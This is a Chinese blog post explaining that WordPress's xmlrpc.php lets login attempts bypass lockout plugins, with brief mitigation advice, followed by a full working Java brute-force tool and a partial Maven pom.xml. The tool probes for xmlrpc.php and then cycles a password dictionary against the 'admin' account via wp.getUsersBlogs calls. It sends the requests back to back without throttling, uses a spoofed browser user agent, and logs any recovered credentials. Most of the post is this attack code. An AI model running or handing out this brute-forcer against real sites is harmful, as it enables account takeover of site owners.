
Wordpress xmlrpc.php暴力破解漏洞

2014-08-02 00:00 309 查看

Wordpress xmlrpc.php暴力破解漏洞

WordPress是很流行的开源博客,它提供远程发布文章的方法,就是使用根路径下的xmlrpc.php这个文件。最近爆出的xmlrpc问题,原理是通过xmlrpc进行认证时,即使认证失败,也不会被WordPress安装的安全插件记录,所以不会触发密码输错N次被锁定的情况——换句话说,这些插件的失败计数并没有覆盖XML-RPC这条认证路径。因此就可能被暴力破解,如果密码又是弱口令的话,就相当危险了。最简单的解决办法,就是删除xmlrpc.php这个文件;但要注意,这同时会使上面提到的远程发布功能失效,如果仍然需要远程发布,应改为在Web服务器层只允许可信来源访问该文件,并确保所有账号使用强口令。闲来无事,用Java写了暴力破解的脚本,其实就是拿着各种用户名、密码去不断调用xmlrpc.php这个文件,检测认证结果,很简单。只为娱乐,暴力破解的事情,大家慎重,只能用在自己的或已获授权测试的站点上。
Xmlrpc.java源码如下:
package com.yeetrack.security.wordpress;

import org.apache.http.client.ClientProtocolException;
import org.apache.http.client.config.RequestConfig;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.entity.StringEntity;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.testng.annotations.Test;

import java.io.*;
import java.nio.charset.StandardCharsets;

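/**
 * Created by victor wang on 2014/8/2.
 *
 * Dictionary attack against a WordPress install through {@code xmlrpc.php}.
 *
 * Each guess is a {@code wp.getUsersBlogs} XML-RPC call carrying the candidate
 * credentials. The page this listing comes from reports that such calls are not
 * recorded by login-lockout plugins, so failed guesses do not trigger a lockout.
 * The remediation the page proposes is removing {@code xmlrpc.php}, which also
 * disables the remote-publishing feature that file exists for.
 *
 * Only plaintext {@code http://} is ever used (both request builders hard-code
 * the scheme), so a TLS-only site is reported as "no xmlrpc.php" rather than
 * probed. Nothing here throttles requests. For authorised testing only.
 */
public class Xmlrpc
{
    private static final Logger logger = LoggerFactory.getLogger(Xmlrpc.class);

    /** Browser-like UA so the probe is not trivially filtered on UA alone. */
    private static final String USER_AGENT =
            "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0";

    /** Applied to connection-pool lease, TCP connect and socket read alike. */
    private static final int TIMEOUT_MS = 4000;

    /** Marker WordPress returns for a GET on xmlrpc.php; its presence is the "exists" signal. */
    private static final String XMLRPC_GET_BANNER = "XML-RPC server accepts POST requests only.";

    final RequestConfig requestConfig = RequestConfig.custom()
            .setConnectionRequestTimeout(TIMEOUT_MS)
            .setConnectTimeout(TIMEOUT_MS)
            .setSocketTimeout(TIMEOUT_MS)
            .build();

    // UA is set once on the client instead of on every request.
    private final CloseableHttpClient httpClient = HttpClients.custom()
            .setUserAgent(USER_AGENT)
            .setDefaultRequestConfig(requestConfig)
            .build();

    /**
     * Probes {@code http://<host>/xmlrpc.php} with a GET and reports whether the
     * endpoint answers with WordPress's stock "POST requests only" banner.
     *
     * @param domain host name or URL; reduced to its host part by {@link #wrapperUrl}
     * @return {@code true} only when the banner is present; {@code false} for a
     *         null/empty input, an entity-less response, any I/O failure, or any
     *         other response body
     */
    private boolean checkXmlRpcFile(String domain)
    {
        String host = wrapperUrl(domain);
        if (host == null)
            return false;
        HttpGet get = new HttpGet("http://" + host + "/xmlrpc.php");
        // try-with-resources: the original never closed the response, which
        // leaks the pooled connection on every probe.
        try (CloseableHttpResponse response = httpClient.execute(get)) {
            if (response.getEntity() == null)
                return false;
            String body = EntityUtils.toString(response.getEntity());
            return body != null && body.contains(XMLRPC_GET_BANNER);
        } catch (IOException e) {
            // The original fell through to resultString.contains(...) here and
            // died with a NullPointerException; "unreachable" now means "not found".
            logger.warn("{}: probe of xmlrpc.php failed", host, e);
            return false;
        }
    }

    /**
     * Submits one credential pair as a {@code wp.getUsersBlogs} call.
     *
     * Success is inferred from the response body containing {@code isAdmin},
     * which a blog listing carries and an XML-RPC fault does not (heuristic kept
     * from the original; a server that echoed that token in an error page would
     * fool it).
     *
     * @param username account name to try
     * @param password candidate password
     * @param url      host name or URL of the target; only the host part is used
     * @return {@code true} if the response looks like an authenticated blog
     *         listing; {@code false} on rejection, empty body or I/O failure
     */
    private boolean forceLogin(String username, String password, String url)
    {
        HttpPost post = new HttpPost("http://" + wrapperUrl(url) + "/xmlrpc.php");
        String xmlString = buildGetUsersBlogsCall(username, password);
        // UTF-8 throughout: the XML declaration, the entity encoding and the
        // dictionary reader in test() must agree, otherwise any non-ASCII
        // password is silently mangled before it reaches the server.
        post.setEntity(new StringEntity(xmlString, StandardCharsets.UTF_8));
        try (CloseableHttpResponse response = httpClient.execute(post)) {
            if (response.getEntity() == null)
                return false;
            String loginResult = EntityUtils.toString(response.getEntity());
            if (loginResult == null || loginResult.isEmpty())
                return false;
            if (loginResult.contains("isAdmin")) {
                // Deliberately logs the recovered credential: that is this tool's output.
                logger.info("{}登录成功,userename--->{}  password--->{}", url, username, password);
                return true;
            }
        } catch (IOException e) {
            // ClientProtocolException is an IOException; one handler covers both.
            logger.warn("{}: xmlrpc.php request failed", url, e);
        }
        return false;
    }

    /**
     * Builds the {@code wp.getUsersBlogs} request body.
     *
     * Credentials are XML-escaped. The original concatenated them raw, so a
     * dictionary entry containing {@code <} or {@code &} produced malformed XML
     * and was counted as a failed guess without ever being tried.
     */
    private static String buildGetUsersBlogsCall(String username, String password)
    {
        return "<?xml version=\"1.0\" encoding=\"UTF-8\"?><methodCall>"
                + "<methodName>wp.getUsersBlogs</methodName><params>"
                + "<param><value>" + escapeXml(username) + "</value></param>"
                + "<param><value>" + escapeXml(password) + "</value></param>"
                + "</params></methodCall>";
    }

    /** Escapes the five XML special characters so {@code s} is safe as element text. */
    private static String escapeXml(String s)
    {
        StringBuilder sb = new StringBuilder(s.length());
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&apos;"); break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    /**
     * Reduces a host name or URL to its host (and port, if any) part.
     *
     * @param url e.g. {@code http://example.com/xmlrpc.php} or {@code example.com}
     * @return {@code example.com}; {@code null} for a null or empty input
     */
    private String wrapperUrl(String url)
    {
        if (url == null || url.isEmpty())
            return null;
        // The original stripped only "http://", so an https URL came back as
        // the bogus host "https:"; strip whatever scheme is present.
        int schemeEnd = url.indexOf("://");
        if (schemeEnd >= 0)
            url = url.substring(schemeEnd + "://".length());
        int pathStart = url.indexOf('/');
        return pathStart >= 0 ? url.substring(0, pathStart) : url;
    }

    /**
     * Entry point (TestNG). Probes the hard-coded target and, if xmlrpc.php is
     * present, tries every line of the password dictionary for user
     * {@code admin}, stopping at the first hit. Requests are issued back to back
     * with no delay between them.
     */
    @Test
    public void test()
    {
        String url = "http://somewordpress.com/xmlrpc.php";
        if (!checkXmlRpcFile(url)) {
            logger.info("{}--->不存在xmlrpc漏洞", url);
            return;
        }
        // Password dictionary, one candidate per line. Read as UTF-8 to match
        // the request encoding; FileReader used the platform default and was
        // never closed.
        File file = new File("src/main/resources/1pass00.txt");
        try (BufferedReader bufferedReader = new BufferedReader(
                new InputStreamReader(new FileInputStream(file), StandardCharsets.UTF_8))) {
            String line;
            int count = 1;
            while ((line = bufferedReader.readLine()) != null) {
                System.out.println("" + count + "  " + line);
                if (forceLogin("admin", line, url))
                    break;
                count++;
            }
        } catch (IOException e) {
            logger.error("cannot read password dictionary {}", file, e);
        }
    }
}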


项目使用Maven管理,依赖Apache HttpClient、SLF4J日志接口(原文称log4j,代码中实际通过slf4j的Logger调用)以及TestNG(代码中的@Test注解来自它),pom.xml代码如下(原文只贴出了开头部分):
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> <modelVersion>4.0.0</modelVersion>

<groupId>com.yeetrack.security</groupId>
<artifactId>wordpress-xmlrpc</artifactId>
<version>1.0-SNAPSHOT</version>

